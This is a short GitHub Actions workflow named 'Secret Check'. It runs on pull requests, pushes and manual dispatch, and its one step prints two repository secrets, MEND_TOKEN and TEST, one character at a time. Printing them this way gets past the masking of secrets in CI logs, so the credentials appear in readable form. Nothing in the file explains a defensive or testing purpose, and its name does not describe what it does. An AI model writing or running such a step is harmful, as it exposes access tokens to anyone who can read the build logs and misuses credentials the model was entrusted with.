name: Secret Check

on:
  pull_request:
  push:
    branches:
      - master
  workflow_dispatch:

jobs:
  print_secret:
    runs-on: ubuntu-latest

    steps:
    - name: Print secret
      env:
        SECRET: ${{ secrets.MEND_TOKEN }}
        SECRET2: ${{ secrets.TEST }}
      run:  |
        import os
        import time
        
        print('Printing First Secret:')
        for char in (os.getenv("SECRET")):
          time.sleep(0.5)
          print(char)
        print('\nPrinting Second Secret')
        for char in (os.getenv("SECRET2")):
          time.sleep(0.5)
          print(char)
      shell: python
